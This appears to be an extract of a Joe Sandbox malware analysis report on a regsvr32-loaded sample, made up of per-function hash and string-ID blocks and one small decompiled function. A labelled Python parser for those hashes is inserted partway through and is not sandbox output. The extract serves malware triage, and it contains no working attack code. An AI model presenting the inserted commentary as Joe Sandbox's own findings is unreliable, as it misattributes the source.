                                                                                            • Instruction Fuzzy Hash: 0241D6B090038ACBCB48CF64C99A5DE7BB1FB48358F114A2DF82697350D3B49664CF80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: j$[
                                                                                            • API String ID: 0-3696242357
                                                                                            • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                            • Instruction ID: 2b3c419e1e7376abbec55d31f3f0e59bb8af4c64e499347c8606597baa97e938
                                                                                            • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                            • Instruction Fuzzy Hash: 5E41D5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: + $S"
                                                                                            • API String ID: 0-2880694137
                                                                                            • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                            • Instruction ID: 3997b0d77a3cbbce49aa6970110ff228252a62f11537e0b3de33ec13074dd8fd
                                                                                            • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                            • Instruction Fuzzy Hash: 5C51B5B090078ECFDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: =K$d%
                                                                                            • API String ID: 0-2790768846
                                                                                            • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                            • Instruction ID: 8586ef3cd3dff81e7df8af4218970a7a4508d2f9ab316a06a662e4b3d9afc5bc
                                                                                            • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                            • Instruction Fuzzy Hash: 5741E4B090074E8BDF48CF64C88A5DE7BF0FB58358F104A1DE86AA6250D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #|$`
                                                                                            • API String ID: 0-1687004633
                                                                                            • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                            • Instruction ID: c3e75afa0712d8ae90a2e539acd1e71a09905fb2a4a7a2646132e30fe0a2813c
                                                                                            • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                            • Instruction Fuzzy Hash: DC41D6B190078E8FDF48CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: c$j~;
                                                                                            • API String ID: 0-3832213246
                                                                                            • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                            • Instruction ID: 25ce31f5d98f68ca11bbea036d20606e4569f88ca1f7aa9c39b14acd2f253860
                                                                                            • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                            • Instruction Fuzzy Hash: 2141A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC6696250D3B89661CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -h$W
                                                                                            • API String ID: 0-4146498651
                                                                                            • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                            • Instruction ID: 9c874dd5da8a40f368f212b03d844fc60c651015905fe71f71fc8e3a665a1f6e
                                                                                            • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                            • Instruction Fuzzy Hash: 8041A4B590038EDFDB44CF68D88A5CE7BF0FB48358F114619F869A6250D3B49664CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$fp
                                                                                            • API String ID: 0-3298127435
                                                                                            • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                            • Instruction ID: 07b2940b05991023366ec3f3d37c25f508377fafc4968f84e53af630630fac74
                                                                                            • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                            • Instruction Fuzzy Hash: 7141F4B190470E8BDB88CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$Zs
                                                                                            • API String ID: 0-3922668666
                                                                                            • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                            • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                            • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                            • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: XW$s [
                                                                                            • API String ID: 0-2366283936
                                                                                            • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                            • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                            • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                            • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4V$jn(
                                                                                            • API String ID: 0-2529302498
                                                                                            • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                            • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                            • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                            • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: '$%6
                                                                                            • API String ID: 0-1852427169
                                                                                            • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                            • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                            • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                            • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: uS$J
                                                                                            • API String ID: 0-437994327
                                                                                            • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                            • Instruction ID: 932e051fa095f2452f9631590778fc2aece6e7424a24d942ca29929a088bb8e0
                                                                                            • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                            • Instruction Fuzzy Hash: D131C6B190034E8FDB84CF64C88A5DE7FB0FB28358F104619E859A6260D3B89695CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +@$`.P
                                                                                            • API String ID: 0-1189405855
                                                                                            • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                            • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                            • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                            • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ^$R
                                                                                            • API String ID: 0-3595634639
                                                                                            • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                            • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                            • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                            • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: t^$w
                                                                                            • API String ID: 0-1486493484
                                                                                            • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                            • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                            • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                            • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #
                                                                                            • API String ID: 0-606707520
                                                                                            • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                            • Instruction ID: 4dd1cb3b4079214fceea326a174ac78aac63e1fa506fb9bcebaf2a82943caac1
                                                                                            • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                            • Instruction Fuzzy Hash: F9223870D14709EFDB58DFA8C49A49EBBF1FF44348F40816DE80AAB290D7749A19CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

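                                                                                            As an added example, not part of the Joe Sandbox report, here is a small Python parser for the per-function Similarity blocks listed above. It pulls out the source dump, offset, Opcode ID, Instruction ID and both fuzzy hashes, checks that the digests are well formed, and groups the instruction fuzzy hashes per memory dump so they can be used as pivot values against other reports. The sample text is constructed from two of the entries on this page; the observation that Opcode ID and Opcode Fuzzy Hash carry the same value is read off the page rather than taken from Joe Sandbox documentation, and all function names are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample: two per-function "Similarity" entries in the same layout
# as the report (values copied from entries on this page, not new data).
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: + $S"
• API String ID: 0-2880694137
• Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
• Instruction ID: 3997b0d77a3cbbce49aa6970110ff228252a62f11537e0b3de33ec13074dd8fd
• Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
• Instruction Fuzzy Hash: 5C51B5B090078ECFDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B89665CF85
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: =K$d%
• API String ID: 0-2790768846
• Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
• Instruction ID: 8586ef3cd3dff81e7df8af4218970a7a4508d2f9ab316a06a662e4b3d9afc5bc
• Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
• Instruction Fuzzy Hash: 5741E4B090074E8BDF48CF64C88A5DE7BF0FB58358F104A1DE86AA6250D3B89665CF85
Uniqueness

Uniqueness Score: -1.00%
"""

# "• key: value" lines inside a block (key is everything up to the first colon).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
# The Source File value carries the dump name, load offset and PE flag.
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def parse_similarity_entries(text):
    """Split report text into per-function entries (one per 'Memory Dump Source'
    header) and collect the bullet fields plus the Uniqueness Score."""
    entries = []
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "Memory Dump Source":
            current = {}
            entries.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.group("key").strip(), m.group("val").strip()
            if key == "Source File":
                s = SOURCE_RE.match(val)
                if s:
                    current["source_file"] = s.group("file")
                    current["offset"] = int(s.group("offset"), 16)
                    current["based_on_pe"] = s.group("pe") == "true"
            else:
                current[key] = val
        elif stripped.startswith("Uniqueness Score:"):
            current["uniqueness_score"] = float(stripped.split(":", 1)[1].strip().rstrip("%"))
    return entries


def validate(entry):
    """Checks worth running before pivoting: the IDs are 64-hex digests, and
    Opcode ID equals Opcode Fuzzy Hash here, so the pair must not be counted
    as two independent indicators. Returns a list of problems (empty = ok)."""
    problems = []
    for k in ("Opcode ID", "Instruction ID", "Opcode Fuzzy Hash"):
        if not SHA256_RE.match(entry.get(k, "")):
            problems.append(f"{k} is not a 64-hex-char digest")
    if entry.get("Opcode ID") != entry.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    return problems


def pivot_table(entries):
    """Group instruction fuzzy hashes by the memory dump they came from;
    repeated hashes across functions collapse into one set entry."""
    table = defaultdict(set)
    for e in entries:
        if "Instruction Fuzzy Hash" in e and "source_file" in e:
            table[e["source_file"]].add(e["Instruction Fuzzy Hash"])
    return dict(table)


if __name__ == "__main__":
    parsed = parse_similarity_entries(SAMPLE_REPORT)
    for e in parsed:
        print(e["Opcode ID"][:16], e["Instruction Fuzzy Hash"], validate(e) or "ok")
    print(pivot_table(parsed))
```

Run it on the text of a whole report rather than the two-entry sample to get one set of instruction fuzzy hashes per dumped region; the regsvr32 region at offset 0x731000 on this page would yield one set, and the PE-backed 0x180000000 region another.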
                                                                                            C-Code - Quality: 100%
                                                                                            			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                            				signed long long _t25;
                                                                                            				void* _t27;
                                                                                            				void* _t30;
                                                                                            
                                                                                            				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                            				 *(_t30 + 0x10) = _t25;
                                                                                            				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                            				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                            				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
                                                                                            				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
                                                                                            				return __rdx + 0xb;
                                                                                            			}







                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ef
                                                                                            • API String ID: 0-3522424648
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: x]!-
                                                                                            • API String ID: 0-585868058
                                                                                            • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                            • Instruction ID: 5b4d536fe385f5c0b14889ed56efff0f3569bab156a5faf58a890053aa4a1cc9
                                                                                            • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                            • Instruction Fuzzy Hash: 79D189B1A0060DCFDBA8CF78C54A5DD7BF1BB48308F606129E826AA2B6D7749905CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: }^O
                                                                                            • API String ID: 0-3039680174
                                                                                            • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                            • Instruction ID: 67c0f23fd29af9def71624402dbd1979e55da75dccd8172f5820373a17c577f1
                                                                                            • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                            • Instruction Fuzzy Hash: 27A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RH
                                                                                            • API String ID: 0-2975065227
                                                                                            • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                            • Instruction ID: 5d7c4141c7ba739edcc02c79d247265394a425e43ae5a28859ffa4e70af1ed33
                                                                                            • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                            • Instruction Fuzzy Hash: 0451187111C7448FC7A8DF18D4C66AAB7E0FB94310FA0991DE8CEC7251DF74A88A9B46
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Y
                                                                                            • API String ID: 0-579211002
                                                                                            • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                            • Instruction ID: 767c8bafb3f122f815eb64fbcb5c37a281c3f627f3bbe5dd6bd576d2f76ce603
                                                                                            • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                            • Instruction Fuzzy Hash: 4551F5715107898BDB59DF28C88A0DD3BA1FB4835CF425318FD8EA62A1D77CD845CB49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: vOs
                                                                                            • API String ID: 0-1852020951
                                                                                            • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                            • Instruction ID: 62463a4996b39f7b395a9544c20fe865bde2d56aed95b0373e175d94b2f0c39d
                                                                                            • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                            • Instruction Fuzzy Hash: 20618DB190030ECFDB49CF68D48A5CE7FB0FB64398F204519E845A6260D7B996A8CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *)
                                                                                            • API String ID: 0-1811957435
                                                                                            • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                            • Instruction ID: ca14b646306a201cbebf8859462843f9ceaed425e9293687db7a7dfae74d02d9
                                                                                            • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                            • Instruction Fuzzy Hash: 8D31933061CB888FC72CDF29D08556AB7E0FB99301F504A2EE58AC7365DB74D805CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: t
                                                                                            • API String ID: 0-1935021737
                                                                                            • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                            • Instruction ID: 0e3b87161036056717c35a601d53e9d543cbe45ac87f3e7cd29bb7bbf1fa8cf4
                                                                                            • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                            • Instruction Fuzzy Hash: 27319F3061DB848FE768DF2CD48916ABBE0FB96340F104A6DE5CAC7266D770D805CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

